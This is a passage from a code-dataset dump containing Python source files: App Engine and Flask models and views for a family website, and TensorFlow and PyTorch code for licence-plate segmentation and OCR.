"text": "from google.appengine.ext import ndb\nfrom family.utils import pretty_date\n\n\nclass ChatSubscriber(ndb.Model):\n \"\"\" This is simply a persisted list of jids, which is an XMPP chat address\n Here, we use jid as the special unique \"key_name\", an NDB concept that acts as a unique id for the entity\n \"\"\"\n is_online = ndb.BooleanProperty()\n\n @classmethod\n def add_subscriber(cls, jid):\n cls.get_or_insert(jid)\n\n @classmethod\n def remove_subscriber(cls, jid):\n key = ndb.Key(cls, jid)\n key.delete()\n\n\nclass ChatMessage(ndb.Model):\n sender = ndb.StringProperty(required=True)\n body = ndb.StringProperty(required=True)\n posted_date = ndb.DateTimeProperty(auto_now_add=True)\n humanized_posted_date = ndb.ComputedProperty(lambda self: pretty_date(time=self.posted_date))\n\n @classmethod\n def save_message(cls, sender, body):\n message = cls(sender=sender, body=body)\n message.put()\n"
},
{
"alpha_fraction": 0.6516128778457642,
"alphanum_fraction": 0.6516128778457642,
"avg_line_length": 24.83333396911621,
"blob_id": "df40a4075224c5578097eb9362201851becd30f3",
"content_id": "c4db6206be96abf067f863c2e0359dff0201fc8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 6,
"path": "/family/views/__init__.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "import pkgutil\n\n\ndef setup_views():\n for module_loader, name, ispkg in pkgutil.iter_modules(__path__, prefix='family.views.'):\n __import__(name)\n"
},
{
"alpha_fraction": 0.7170417904853821,
"alphanum_fraction": 0.7186495065689087,
"avg_line_length": 28.619047164916992,
"blob_id": "c20e40dde42966a91063f249b395afa1055b780a",
"content_id": "76fefdbf80f2cc2523575f085313ce235b8ceece",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 622,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 21,
"path": "/family/models/message.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from markdown2 import markdown\nfrom google.appengine.ext import ndb\nfrom family.models.member import Member\nfrom family.utils import pretty_date\n\n\nclass Message(ndb.Model):\n \"\"\" Represents a message on the message board \"\"\"\n\n owner_key = ndb.KeyProperty(kind=Member)\n body = ndb.TextProperty()\n posted_date = ndb.DateTimeProperty()\n humanized_posted_date = ndb.ComputedProperty(lambda self: pretty_date(time=self.posted_date))\n\n @property\n def owner(self):\n return self.owner_key.get() if self.owner_key else None\n\n @property\n def body_formatted(self):\n return markdown(self.body)\n"
},
{
"alpha_fraction": 0.4964788854122162,
"alphanum_fraction": 0.5340375304222107,
"avg_line_length": 22.027027130126953,
"blob_id": "dfc09de18043c97f2ccfad6cf0f4ee84b6432151",
"content_id": "d918d6c2c399e58fe59d573368f8248761523ea4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 852,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 37,
"path": "/family/views/calendar.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from family import app\nfrom family.decorators import requires_login\nfrom flask.json import jsonify\nfrom flask.templating import render_template\n\n\[email protected]('/calendar', methods=['GET'])\n@requires_login\ndef calendar():\n return render_template('calendar.html')\n\n\[email protected]('/calendar/events', methods=['GET'])\n@requires_login\ndef calendar_events():\n \"\"\"\n If you have an error you can return:\n {\n \"success\": 0,\n \"error\": \"error message here\"\n }\n :return:\n \"\"\"\n events = {\n \"success\": 1,\n \"result\": [\n {\n \"id\": 293,\n \"title\": \"Event 1\",\n \"url\": \"http://example.com\",\n \"class\": \"event-important\",\n \"start\": 1461394420000,\n \"end\": 1461395520000\n },\n ]\n }\n return jsonify(events)\n"
},
{
"alpha_fraction": 0.6612318754196167,
"alphanum_fraction": 0.66847825050354,
"avg_line_length": 27.06779670715332,
"blob_id": "01bdc4a23b7e1472b4cde8498b6e7755b0a6ef7e",
"content_id": "ea647f6bf81baffc60e2ba92bf179a23f433dfd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1656,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 59,
"path": "/family/views/auth.py",
"repo_name": "trungly/thelyfamily",
"src_encoding": "UTF-8",
"text": "from google.appengine.ext import ndb\nfrom werkzeug.exceptions import BadRequest, Unauthorized\nfrom flask import session, g, redirect, url_for, request, jsonify\nfrom family.forms import ChangePasswordForm\nfrom family.models.member import Member\nfrom family.decorators import requires_login\nfrom family import app\n\n\[email protected]_request\ndef add_member_to_global():\n if 'member_id' in session:\n member_key = ndb.Key(Member, session['member_id'])\n g.member = member_key.get()\n\n\[email protected]('/login', methods=['POST'])\ndef login():\n \"\"\" Ajax only. This supports logging in via first_name and password\n \"\"\"\n if not request.is_xhr:\n return BadRequest()\n\n member = Member.query(\n Member.first_name_lowercase == request.form['first_name'].lower()\n ).get()\n\n if member and member.check_password(request.form['password']):\n session['member_id'] = member.key.id()\n if request.form.get('stay_logged_in', False):\n session.permanent = True\n return '', 200\n\n return Unauthorized()\n\n\[email protected]('/password/change', methods=['POST'])\n@requires_login\ndef change_password():\n if not request.is_xhr:\n return BadRequest()\n\n password_form = ChangePasswordForm(request.form)\n if not password_form.validate():\n r = jsonify(password_form.errors)\n return r, 400\n\n if not g.member.check_password(password_form.old_password.data):\n return '', 401\n\n g.member.set_password(request.form['new_password'])\n g.member.put()\n return '', 200\n\n\[email protected]('/logout', methods=['GET'])\ndef logout():\n session.pop('member_id')\n return redirect(url_for('home'))\n"
}
] | 33 |
sebastiancepeda/pedro | https://github.com/sebastiancepeda/pedro | a99fba453ee2865bbf6f9e29a604ce99dff634a2 | f606db53aa7ad4f77cd813ac771a0aef3f98b4d8 | 7d5caac5338d52f848bba7cae737e3fd0cd142e5 | refs/heads/master | 2023-02-06T04:06:02.395819 | 2020-12-19T17:57:12 | 2020-12-19T17:57:12 | 280,280,514 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6400602459907532,
"alphanum_fraction": 0.6521084308624268,
"avg_line_length": 27.869565963745117,
"blob_id": "039ab0fa3adf1481a2392e068b6ad69a737899fd",
"content_id": "5bcab4c6395396c10f901d7b9a5c062212f90560",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 664,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 23,
"path": "/cv/seg_models/model_definition.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import segmentation_models as sm\n\nfrom tensorflow import keras\n\n\ndef get_model_definition():\n backbone = 'mobilenet'\n n_classes = 2\n lr = 0.001\n activation = 'softmax'\n pre_process_input = sm.get_preprocessing(backbone)\n optimizer = keras.optimizers.Adam(lr)\n metrics = [\n sm.metrics.FScore(threshold=0.5),\n ]\n model = sm.Linknet(backbone, classes=n_classes, activation=activation,\n encoder_freeze=True)\n if n_classes == 1:\n loss = sm.losses.BinaryFocalLoss()\n else:\n loss = sm.losses.CategoricalFocalLoss()\n model.compile(optimizer, loss, metrics)\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.5584415793418884,
"alphanum_fraction": 0.5686456561088562,
"avg_line_length": 32.6875,
"blob_id": "6c3019ff7ff8ac73d57988c2164626137a0d6800",
"content_id": "57b15f78be85d91e779b8d047d8390675899eee7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1078,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 32,
"path": "/io_utils/image_text_label_generator.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n\n\nclass ImageTextLabelGenerator(tf.keras.utils.Sequence):\n def __init__(self, data_function, preprocess_input, data_function_params):\n self.x_all = None\n self.y_all = None\n self.index_im = 0\n self.data_function = data_function\n self.preprocess_input = preprocess_input\n self.data_function_params = data_function_params\n self.on_epoch_end()\n\n def __len__(self):\n return len(self.x_all)\n\n def __getitem__(self, index):\n x = self.x_all[self.index_im, :, :, :]\n y = self.y_all[self.index_im, :, :, :]\n x = x.reshape(1, x.shape[0], x.shape[1], x.shape[2])\n y = y.reshape(1, y.shape[0], y.shape[1], y.shape[2])\n self.index_im = self.index_im + 1\n if self.index_im >= len(self.x_all):\n self.on_epoch_end()\n x = self.preprocess_input(x)\n return x, y\n\n def on_epoch_end(self):\n self.index_im = 0\n x_all, y_all = self.data_function(**self.data_function_params)\n self.x_all = x_all\n self.y_all = y_all\n"
},
{
"alpha_fraction": 0.5861386060714722,
"alphanum_fraction": 0.5861386060714722,
"avg_line_length": 21.954545974731445,
"blob_id": "5f8670ecdbd463caafeebb92b29285770e4e42d9",
"content_id": "718c5cad10968fe33095971e0575102f1d96aaae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 22,
"path": "/io_utils/utils.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\nimport pandas as pd\n\n\ndef set_index(meta):\n index = meta.file_name.unique()\n index = pd.DataFrame(data={\n 'file_name': index,\n 'idx': range(len(index)),\n })\n meta = meta.merge(index, on=['file_name'], how='left')\n return meta\n\n\nclass CustomLogger:\n\n def __init__(self, prefix, base_logger):\n self.info = lambda msg: base_logger.info(f\"[{prefix}] {msg}\")\n self.debug = lambda msg: base_logger.debug(f\"[{prefix}] {msg}\")\n"
},
{
"alpha_fraction": 0.5945945978164673,
"alphanum_fraction": 0.6332046389579773,
"avg_line_length": 16.266666412353516,
"blob_id": "5e75da8c46dc10274cef5d3ae26da2e21c2ec9b4",
"content_id": "7234b8ec4ec4a0035849d5a0c9773de0cb82ccaa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 259,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 15,
"path": "/cv/pytorch/tests/test_unet_small.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport torch\n\nfrom cv.pytorch.unet_small import UNetSmall\n\n\ndef test_unet_small():\n image = torch.rand((1, 1, 572, 572))\n model = UNetSmall(in_channels=1, out_channels=2)\n y = model(image)\n print(y.size())\n"
},
{
"alpha_fraction": 0.6006389856338501,
"alphanum_fraction": 0.6038338541984558,
"avg_line_length": 29.859155654907227,
"blob_id": "4e344b72ee357049a0a9b401a75f2891aed32e3f",
"content_id": "fb6d14858f1179c4b21f7be635c17e691d3043ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2191,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 71,
"path": "/cv/tensorflow_models/tensorflow_utils.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import os\n\nfrom tensorflow import keras\n\n\ndef train_model(x_train, y_train, x_val, y_val, get_model_definition, params,\n logger):\n epochs = params['epochs']\n model_file = params['model_file']\n model_folder = params['model_folder']\n model_params = params['model_params']\n #\n model, preprocess_input = get_model_definition(**model_params)\n x_train = preprocess_input(x_train)\n x_val = preprocess_input(x_val)\n callbacks = [\n keras.callbacks.ModelCheckpoint(\n model_file,\n save_weights_only=True,\n # save_best_only=False,\n save_best_only=True,\n mode='min'),\n ]\n if not os.path.exists(model_folder):\n os.makedirs(model_folder)\n # Training model\n model.fit(\n x=x_train,\n y=y_train,\n batch_size=1, # 16,\n epochs=epochs,\n validation_data=(x_val, y_val),\n callbacks=callbacks,\n )\n model.load_weights(model_file)\n return model\n\n\ndef train_model_gen(data_train, data_val, model, params, logger):\n epochs = params['epochs']\n model_file = params['model_file']\n model_folder = params['model_folder']\n model_checkpoint_callback = keras.callbacks.ModelCheckpoint(\n model_file,\n save_weights_only=True,\n save_best_only=False, # save_best_only=True,\n mode='min')\n tensorboard_callback = keras.callbacks.TensorBoard(\n log_dir='./graphs', histogram_freq=0, batch_size=32,\n write_graph=False, write_grads=False, write_images=False,\n embeddings_freq=0, embeddings_layer_names=None,\n embeddings_metadata=None, embeddings_data=None,\n update_freq='epoch')\n callbacks = [\n model_checkpoint_callback,\n tensorboard_callback\n ]\n if not os.path.exists(model_folder):\n os.makedirs(model_folder)\n # Training model\n model.fit(\n x=data_train,\n steps_per_epoch=len(data_train),\n epochs=epochs,\n validation_data=data_val,\n validation_steps=len(data_val),\n shuffle=False,\n callbacks=callbacks,\n )\n model.load_weights(model_file)\n return model\n"
},
{
"alpha_fraction": 0.5040720105171204,
"alphanum_fraction": 0.5610801577568054,
"avg_line_length": 29.697368621826172,
"blob_id": "983afff890c593cbd743e35b23d69919770e23f2",
"content_id": "5812e85e3efb452f84c3535c2dd9577b8e0f3d0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2333,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 76,
"path": "/cv/pytorch/unet_small.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom loguru import logger\n\n\ndef double_conv(in_c, out_c):\n conv = nn.Sequential(\n nn.Conv2d(in_c, out_c, kernel_size=3),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_c, out_c, kernel_size=3),\n nn.ReLU(inplace=True),\n )\n return conv\n\n\ndef crop_img(in_tensor, out_tensor):\n out_size = out_tensor.size()[2]\n in_size = in_tensor.size()[2]\n delta = in_size - out_size\n delta = delta // 2\n result = in_tensor[:, :, delta:in_size - delta, delta:in_size - delta]\n return result\n\n\nclass UNetSmall(nn.Module):\n\n def __init__(self, in_channels, out_channels):\n super(UNetSmall, self).__init__()\n # Down convolutions\n self.max_pool_2x2 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.down_conv_1 = double_conv(in_channels, 64)\n self.down_conv_2 = double_conv(64, 128)\n self.down_conv_3 = double_conv(128, 256)\n self.down_conv_4 = double_conv(256, 512)\n self.down_conv_5 = double_conv(512, 1024)\n # Up convolutions\n self.up_trans_1 = nn.ConvTranspose2d(\n in_channels=1024, out_channels=512,\n kernel_size=2, stride=2)\n self.up_conv_1 = double_conv(1024, 512)\n self.up_trans_2 = nn.ConvTranspose2d(\n in_channels=512, out_channels=256,\n kernel_size=2, stride=2)\n self.up_conv_2 = double_conv(512, 256)\n self.up_trans_3 = nn.ConvTranspose2d(\n in_channels=256, out_channels=128,\n kernel_size=2, stride=2)\n self.up_conv_3 = double_conv(256, 128)\n self.up_trans_4 = nn.ConvTranspose2d(\n in_channels=128, out_channels=64,\n kernel_size=2, stride=2)\n self.up_conv_4 = double_conv(128, 64)\n self.out = nn.Conv2d(\n in_channels=64,\n out_channels=out_channels,\n kernel_size=1\n )\n\n def forward(self, image):\n # Encoder\n x1 = self.down_conv_1(image)\n x3 = self.max_pool_2x2(x1)\n x3 = self.down_conv_2(x3)\n # Decoder\n y = crop_img(x3, x3)\n x = self.up_conv_3(torch.cat([x3, y], 1))\n x = self.up_trans_4(x)\n y = crop_img(x1, x)\n x = self.up_conv_4(torch.cat([x, y], 1))\n x = self.out(x)\n return x\n"
},
{
"alpha_fraction": 0.6171460747718811,
"alphanum_fraction": 0.6347464323043823,
"avg_line_length": 38.72932434082031,
"blob_id": "4962cf1b9d79b69c008fe6794a7e60a45bbcc5b2",
"content_id": "0bf96a09eb0acc51cd51bae16bb5f893401dd348",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5284,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 133,
"path": "/services/plate_ocr/inference.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import cv2\nimport pandas as pd\nimport numpy as np\nfrom loguru import logger\n\nfrom cv.image_processing import (\n pred2im, save_image\n)\nfrom cv.tensorflow_models.unet2text3 import (normalize_image_shape)\nfrom cv.tensorflow_models.unet2text3 import get_model_definition as plate_ocr_model_def\nfrom io_utils.data_source import (\n get_image_text_label, get_plates_text_metadata)\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/plate_segmentation'\n output_folder = f'{path}/plates/plate_ocr'\n width = 200\n height = 50\n ocr_height, ocr_width = normalize_image_shape(50, 200)\n alphabet = ' abcdefghijklmnopqrstuvwxyz0123456789'\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'plate_dsize': (ocr_height, ocr_width),\n 'plate_ocr_model_file': f'{output_folder}/model/best_model.h5',\n 'metadata': f\"{path}/plates/input/labels/ocr/files.csv\",\n 'alphabet': alphabet,\n 'debug_level': 1,\n 'plate_ocr_model_params': {\n 'img_height': ocr_height,\n 'img_width': ocr_width,\n 'in_channels': 1,\n 'out_channels': len(alphabet),\n },\n }\n return params\n\n\ndef draw_rectangle(im, r):\n x, y, w, h = r\n im = cv2.rectangle(im, (x, y), (x + w, y + h), (0, 255, 0), 2)\n return im\n\n\ndef image_ocr(event, context):\n logger = context['logger']\n out_folder = context['output_folder']\n debug_level = context['debug_level']\n plate_ocr_model = context['plate_ocr_model']\n plate_ocr_preprocessing = context['plate_ocr_preprocessing']\n in_channels = context['plate_ocr_model_params']['in_channels']\n dsize = context['plate_dsize']\n image = event['image']\n filename = event['file']\n rectangle = event['rectangle']\n image_debug = event['image_debug']\n if image is None:\n result = {\n 'filename': filename,\n 'text': 'none_image',\n }\n return result\n if len(image.shape) == 3 and image.shape[2] == 3:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n rectangle_point = rectangle.mean(axis=0).astype(int)\n image = cv2.resize(image, dsize=(dsize[1], dsize[0]), interpolation=cv2.INTER_CUBIC)\n image = np.reshape(image, dsize)\n image_pred = plate_ocr_preprocessing(image)\n image_pred = image_pred.reshape(1, dsize[0], dsize[1], in_channels)\n image_pred = plate_ocr_model.predict(image_pred)\n image_pred = np.argmax(image_pred, axis=3)\n alphabet = context['alphabet']\n inv_alphabet = {alphabet[char]: char for char in alphabet.keys()}\n image_pred = image_pred.flatten().tolist()\n text_pred = [inv_alphabet[idx] for idx in image_pred]\n text_pred = ''.join(text_pred)\n text_pred = text_pred.upper().strip()\n file_shortname = filename.split('/')[-1].split('.')[0]\n logger.info(f\"[{file_shortname}] detected text: {text_pred.upper()}\")\n if debug_level > 0:\n font = cv2.FONT_HERSHEY_TRIPLEX\n pos1 = (rectangle_point[0], rectangle_point[1]+100)\n pos2 = (rectangle_point[0]+200, rectangle_point[1]+200)\n image_debug = cv2.rectangle(image_debug, pos1, pos2, (0, 0, 0), -1)\n line = cv2.LINE_AA\n pos = (rectangle_point[0], rectangle_point[1] + 150)\n image_debug = cv2.putText(image_debug, text_pred, pos, font, 1, (0, 255, 0), 2, line)\n save_image(image_debug, f\"{out_folder}/image_debug_text_{file_shortname}.png\")\n result = {\n 'filename': filename,\n 'text': text_pred,\n }\n return result\n\n\ndef ocr_plates(params, logger):\n model_file = params['plate_ocr_model_file']\n input_folder = params['input_folder']\n dsize = params['plate_dsize']\n in_channels = params['plate_ocr_model_params']['in_channels']\n out_channels = params['plate_ocr_model_params']['out_channels']\n model_params = params['plate_ocr_model_params']\n alphabet = params['alphabet']\n logger.info(\"Loading model\")\n plate_ocr_model, plate_ocr_preprocessing = plate_ocr_model_def(**model_params)\n plate_ocr_model.load_weights(model_file)\n logger.info(\"Loading data\")\n meta = get_plates_text_metadata(params)\n meta.file_name = 'plate_' + meta.file_name\n meta.file_name = meta.file_name.str.split('.').str[0]+'.png'\n meta = set_index(meta)\n x, _ = get_image_text_label(input_folder, meta, dsize, in_channels, out_channels, alphabet)\n images = map(lambda idx: pred2im(x, dsize, idx, in_channels), range(len(x)))\n context = {\n 'plate_ocr_model': plate_ocr_model,\n 'plate_ocr_preprocessing': plate_ocr_preprocessing,\n 'logger': logger,\n }\n context.update(params)\n events = [{'image': im, 'file': filename, 'ejec_id': ejec_id\n } for ejec_id, filename, im in zip(range(len(meta)), meta.file_name, images)]\n results = map(lambda e: image_ocr(event=e, context=context), events)\n results = map(lambda e: {k: e[k] for k in ('filename', 'text')}, results)\n results = pd.DataFrame(results)\n results.to_csv(f\"{params['output_folder']}/ocr_events_results.csv\")\n\n\nif __name__ == \"__main__\":\n ocr_plates(get_params(), logger)\n"
},
{
"alpha_fraction": 0.5295150279998779,
"alphanum_fraction": 0.5916172862052917,
"avg_line_length": 37.9487190246582,
"blob_id": "7a2f00c5ac292026e9fd8ae768d446d0e5b53819",
"content_id": "8888ba36c448050a54aaecf84637f9de0c6e9a59",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4557,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 117,
"path": "/cv/tensorflow_models/unet.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import (\n Conv2D, Conv2DTranspose, BatchNormalization, Dropout, Lambda, Input,\n MaxPooling2D, concatenate,\n)\n\n\ndef identity_function(x):\n return x\n\n\ndef get_model_definition(img_height, img_width, in_channels, out_channels):\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n drop_p = 0.1\n inputs = Input((img_height, img_width, in_channels))\n pre_processing = Lambda(lambda x: x / 255)(inputs)\n c1 = Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(pre_processing)\n c1 = BatchNormalization()(c1)\n c1 = Dropout(drop_p)(c1)\n c1 = Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c1)\n c1 = BatchNormalization()(c1)\n\n c2 = MaxPooling2D((2, 2))(c1)\n c2 = Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c2)\n c2 = BatchNormalization()(c2)\n c2 = Dropout(drop_p)(c2)\n c2 = Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c2)\n c2 = BatchNormalization()(c2)\n\n c3 = MaxPooling2D((2, 2))(c2)\n c3 = Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c3)\n c3 = BatchNormalization()(c3)\n c3 = Dropout(drop_p)(c3)\n c3 = Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c3)\n c3 = BatchNormalization()(c3)\n\n c4 = MaxPooling2D((2, 2))(c3)\n c4 = Conv2D(512, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c4)\n c4 = BatchNormalization()(c4)\n c4 = Dropout(drop_p)(c4)\n c4 = Conv2D(512, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c4)\n c4 = BatchNormalization()(c4)\n\n c5 = MaxPooling2D(pool_size=(2, 2))(c4)\n c5 = Conv2D(1024, (3, 3), activation='relu',\n kernel_initializer='he_normal',\n padding='same')(c5)\n c5 = BatchNormalization()(c5)\n c5 = Dropout(drop_p)(c5)\n c5 = Conv2D(1024, (3, 3), activation='relu',\n kernel_initializer='he_normal',\n padding='same')(c5)\n c5 = BatchNormalization()(c5)\n\n u6 = Conv2DTranspose(512, (2, 2), strides=(2, 2), padding='same')(c5)\n u6 = concatenate([u6, c4])\n c6 = Conv2D(512, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(u6)\n c6 = BatchNormalization()(c6)\n c6 = Dropout(drop_p)(c6)\n c6 = Conv2D(512, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c6)\n c6 = BatchNormalization()(c6)\n\n u7 = Conv2DTranspose(256, (2, 2), strides=(2, 2), padding='same')(c6)\n u7 = concatenate([u7, c3])\n c7 = Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(u7)\n c7 = BatchNormalization()(c7)\n c7 = Dropout(drop_p)(c7)\n c7 = Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c7)\n c7 = BatchNormalization()(c7)\n\n u8 = Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c7)\n u8 = concatenate([u8, c2])\n c8 = Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(u8)\n c8 = BatchNormalization()(c8)\n c8 = Dropout(drop_p)(c8)\n c8 = Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c8)\n c8 = BatchNormalization()(c8)\n\n u9 = Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c8)\n u9 = concatenate([u9, c1], axis=3)\n c9 = Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(u9)\n c9 = BatchNormalization()(c9)\n c9 = Dropout(drop_p)(c9)\n c9 = Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal',\n padding='same')(c9)\n c9 = BatchNormalization()(c9)\n\n outputs = Conv2D(out_channels, (1, 1), activation='sigmoid')(c9)\n\n model = Model(inputs=[inputs], outputs=[outputs])\n model.compile(optimizer='adam', loss='binary_crossentropy',\n metrics=['accuracy'])\n pre_process_input = identity_function\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.6199007630348206,
"alphanum_fraction": 0.6380926370620728,
"avg_line_length": 38.868133544921875,
"blob_id": "bf21c2f4f10328ad6cca7ee7de5d07e8657a21db",
"content_id": "093fa8df0451f4553e45298cbc4400e915a0a7d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3628,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 91,
"path": "/services/alpr/inference.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import glob\nimport pandas as pd\n\nfrom cv.tensorflow_models.unet2text3 import (normalize_image_shape)\nfrom cv.tensorflow_models.unet_little import get_model_definition as plate_seg_model_def\nfrom cv.tensorflow_models.unet2text3 import get_model_definition as plate_ocr_model_def\nfrom services.plate_segmentation.inference import plate_segmentation\nfrom services.plate_ocr.inference import image_ocr\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/input/'\n output_folder = f'{path}/plates/alpr'\n dsize = (256, 256)\n alphabet = ' abcdefghijklmnopqrstuvwxyz0123456789'\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n big_shape = (1024, 1024)\n plate_shape = (200, 50)\n color = (255, 0, 0)\n thickness = 3\n debug_level = 1\n min_pct = 0.04\n max_pct = 0.20\n ocr_height, ocr_width = normalize_image_shape(50, 200)\n min_area = (big_shape[0] * min_pct) * (big_shape[1] * min_pct)\n max_area = (big_shape[0] * max_pct) * (big_shape[1] * max_pct)\n train_files = glob.glob(f\"{input_folder}/train/*.jpg\")\n test_files = glob.glob(f\"{input_folder}/test/*.jpg\")\n files = train_files + test_files\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'files': files,\n 'plate_shape': plate_shape,\n 'color': color,\n 'thickness': thickness,\n 'debug_level': debug_level,\n 'dsize': dsize,\n 'plate_dsize': (ocr_height, ocr_width),\n 'plate_segmentation_model_file': f\"{path}/plates/plate_segmentation/model/best_model.h5\",\n 'plate_ocr_model_file': f\"{path}/plates/plate_ocr/model/best_model.h5\",\n 'alphabet': alphabet,\n 'big_shape': big_shape,\n 'min_area': min_area,\n 'max_area': max_area,\n 'plate_ocr_model_params': {\n 'img_height': ocr_height,\n 'img_width': ocr_width,\n 'in_channels': 1,\n 'out_channels': len(alphabet),\n },\n 'plate_segmentation_model_params': {\n 'img_height': 256,\n 'img_width': 256,\n 'in_channels': 3,\n 'out_channels': 2,\n },\n }\n return params\n\n\ndef alpr_inference(params):\n from loguru import logger\n\n logger.add(f\"{params['output_folder']}/logger.log\")\n logger.info(\"Loading model\")\n plate_segmentation_model, plate_segmentation_preprocessing = plate_seg_model_def(**params['plate_segmentation_model_params'])\n plate_segmentation_model.load_weights(params['plate_segmentation_model_file'])\n plate_ocr_model, plate_ocr_preprocessing = plate_ocr_model_def(**params['plate_ocr_model_params'])\n plate_ocr_model.load_weights(params['plate_ocr_model_file'])\n logger.info(\"Loading data\")\n files = params['files']\n context = {\n 'logger': logger,\n 'plate_ocr_model': plate_ocr_model,\n 'plate_ocr_preprocessing': plate_ocr_preprocessing,\n 'plate_segmentation_model': plate_segmentation_model,\n 'plate_segmentation_preprocessing': plate_segmentation_preprocessing,\n }\n context.update(params)\n events = [{'image_file': f, 'ejec_id': ejec_id} for ejec_id, f in enumerate(files)]\n results = map(lambda e: plate_segmentation(event=e, context=context), events)\n results = map(lambda e: image_ocr(event=e, context=context), results)\n results = map(lambda e: {k: e[k] for k in ('filename', 'text')}, results)\n results = pd.DataFrame(results)\n results.to_csv(f\"{params['output_folder']}/ocr_events_results.csv\")\n\n\nif __name__ == \"__main__\":\n alpr_inference(get_params())\n"
},
{
"alpha_fraction": 0.5843495726585388,
"alphanum_fraction": 0.5955284833908081,
"avg_line_length": 34.14285659790039,
"blob_id": "68c455433d8eae727bb7c31d61ce1e10e19c2c15",
"content_id": "3bc0af01d8da082754a2faad95eab4f0132f8960",
